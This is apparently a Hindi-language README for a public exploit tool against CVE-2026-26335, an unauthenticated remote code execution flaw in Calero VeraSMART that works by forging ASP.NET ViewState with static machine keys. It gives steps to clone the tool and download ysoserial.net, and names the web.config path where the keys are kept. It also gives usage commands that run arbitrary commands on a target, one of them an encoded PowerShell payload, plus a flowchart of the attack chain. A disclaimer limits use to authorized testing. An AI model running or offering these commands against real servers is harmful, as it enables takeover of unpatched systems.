
# CVE-2026-26335 के लिए स्वचालित एक्सप्लॉइट, Calero VeraSMART में एक गंभीर बिना प्रमाणीकरण वाला RCE, जो स्थिर मशीन कुंजियों का उपयोग करके जाली ASP.NET ViewState के माध्यम से होता है। इसमें एंडपॉइंट खोज, पेलोड निर्माण और कमांड निष्पादन शामिल है।
मोहम्मद इदरीस बन्यामेर सुरक्षा शोधकर्ता
CVE‑2026‑26335 Calero VeraSMART (पूर्व‑2022 R1) में एक गंभीर बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन (RCE) भेद्यता है।
एप्लिकेशन सभी इंस्टॉलेशनों में साझा किए गए स्थिर हार्ड‑कोडेड ASP.NET मशीन कुंजियों का उपयोग करता है।
इन कुंजियों वाला एक हमलावर दुर्भावनापूर्ण ASP.NET ViewState बना सकता है और सर्वर‑साइड डिसीरियलाइज़ेशन → RCE ट्रिगर कर सकता है।
यह एक्सप्लॉइट स्वचालित करता है:
__VIEWSTATEGENERATOR निष्कर्षणCWE‑321 — हार्ड‑कोडेड क्रिप्टोग्राफ़िक कुंजियाँ
VeraSMART डिप्लॉयमेंट समान ASP.NET machineKey का पुनः उपयोग करते हैं:
<machineKey validationKey="STATIC_KEY"
decryptionKey="STATIC_KEY"
validation="SHA1"
decryption="AES" />
एक इंस्टॉलेशन से कुंजियाँ रखने वाला कोई भी हमलावर सभी पर हमला कर सकता है।
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe
कुंजियाँ सार्वजनिक नहीं हैं। लक्ष्य से प्राप्त करें:
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config
या साथी फ़ाइल‑रीड के माध्यम से:
CVE‑2026‑26333
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v
9.8 — गंभीर AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VeraSMART 2022 R1 में ठीक किया गया:
कार्यवाहक उपाय (Workarounds):
केवल शैक्षिक और अधिकृत परीक्षण के लिए। केवल उन्हीं सिस्टमों पर उपयोग करें जिनके स्वामी आप हैं या जिनका मूल्यांकन करने की अनुमति आपके पास है।
मोहम्मद इदरीस बन्यामेर सुरक्षा शोधकर्ता
निम्नलिखित आरेख Calero VeraSMART में CVE‑2026‑26335 की एक्सप्लॉइटेशन श्रृंखला को दर्शाता है, जहाँ स्थिर ASP.NET मशीन कुंजियाँ दुर्भावनापूर्ण ViewState बनाने की अनुमति देती हैं जिससे रिमोट कोड निष्पादन होता है।
flowchart LR
A[Attacker] --> B[Obtain VeraSMART machineKey]
B --> C[Discover ViewState endpoint]
C --> D[Extract __VIEWSTATEGENERATOR]
D --> E[Generate malicious ViewState via ysoserial]
E --> F[Sign payload with machineKey]
F --> G[Send forged POST request]
G --> H[ASP.NET ViewState deserialization]
H --> I[TypeConfuseDelegate gadget]
I --> J[Remote Code Execution on IIS]